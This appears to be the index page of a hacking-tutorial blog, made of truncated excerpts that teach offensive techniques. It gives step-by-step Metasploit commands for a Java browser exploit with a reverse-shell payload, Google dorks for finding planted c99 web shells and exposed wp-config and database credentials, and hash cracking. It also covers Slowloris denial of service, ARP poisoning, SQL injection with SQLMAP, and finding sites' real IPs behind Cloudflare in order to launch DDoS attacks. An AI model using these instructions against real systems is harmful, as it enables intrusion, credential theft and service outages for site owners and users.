How to Hack targeted website(Basic)?

Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having your own website will definitely help you in getting more customer purchasing your products but at the same time you can also also attract hackers to play around with your site. If you have not taken enough care to protect your site from hackers then your business can even come to an end because of these hackers.Before you hack into a system, you must decide what your goals are. Are you hacking...

Read More

How to exploit robots.txt?

What is robots.txt?Robots.txt is a file that contain path which cannot crawled by bot most of time search-engine bots like google bot or etc. It tells search-engine that this directory is private & can not be crawled by them.If yo are site owner & want to make robots.txt file , then go following link , it will create robots.txt file for you.http://www.mcanerin.com/EN/search-engine/robots-txt.aspso just for now , robots.txt is pretty much...

Read More

How to POISONING ARP on network?

How to do Address Resolution Protocol (ARP) poisoning?What Does ARP Mean?Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communicationbetween local nodes can be made.On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program...

Read More

How to use latest java vulnerability to hack remote p.c. ?

Today we are going to use metasploit again. We can hack remote computer using java applet to run code outside send-box. This vulnerability is new. It` s applicable to java version 7 and earlier.(1)To use this vulnerability first update your metasploit modules by runnig command msfupdate in your terminal(2)Now after update type msfconsole(3)type use exploit/multi/browser/java_jre17_jaxws(4)set payload java/shell_reverse_tcp(5)set lhost 223.232.185.97(your I.p)(6)set srvhost 223.232.185.97(server I.p.)(7)set uripath /(8)exploitNow an URL you should...

Read More

How to crack any hash with help of online services?

How to crack any hash with help of online services?findmyhash.py try to crack different types of hashes using free online services.(1)Download it from here .(2)Open terminal & change directory where you download tool , if we download tool in download folder then type in following command in terminalcd Downloads(3)python findmyhash.pyAccepted algorithms are:MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPERNOTE: for LM / NTLM it is recommended to introduce both values with this format:python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7python...

Read More

how to crack md5 hash in ubuntu?

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like here.We are using a perl script to crack an hash so we had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt...

Read More

How to install & use SLOWLORIS in ubuntu?

(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.(4)Then type in your terminal:sudo apt-get install perl-docand enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris...

Read More

Some cool Google Dork

Symlink dork.Code:inurl:/sym/root/ & intext:"Parent Directory"c99shell dork.Code:inurl:(shell.php | c99.php) Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logoutc99shell dork(2).Code:inurl:(shell.php | c99.php) intitle:c99shell Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove LogoutWordPress MySQL details.Code:inurl:(wp-config.conf | wp-config.txt) ext:(conf | txt | config)Databases username && passwords.Code:inurl:/includes/ & ext:inc & inurl:connect | inurl:dbconnect & -site:phpkode.comPhish...

Read More

How to find person through his email-address?

How to find person through its email-address? If you get email from unknown person and before giving reply to email, you want to find little information about that person , then you need reverse email-address lookup. Or someone who abuse you , & you want to trace person you should use reverse email-address lookup. If person has website or listed his account in any public website then you can find information about use of search engine. But in...

Read More

HOW TO DO SQL INJECTION FROM LINUX?

Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than HAVIJ.How To Use SqlMap?(1)Download SQLMAP here.(2)Now extract it wherever you want.(3)Change directory & I mean if you extract to download then, open terminal & type following codecd Downloadscd sqlmapproject-sqlmap-f305dde(4)Now if you want to find...

Read More

HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?

All these methods are based on bad admin configurations, but still are quite commonIf you want to find real I.P. address of website, which is hidden by CLOUDFLARE. It has came to my attention that many booters, hosts, malicious websites, and more use CloudFlare for DDoS Protection & Anti-Abuse Report Protection. With CloudFlare protection, it is difficult to get the hosts IP; therefore, it is difficult to send an abuse report or launch a (D)DoS...

Read More

How to do SQL injection manually?

According to Wikipedia, SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also...

Read More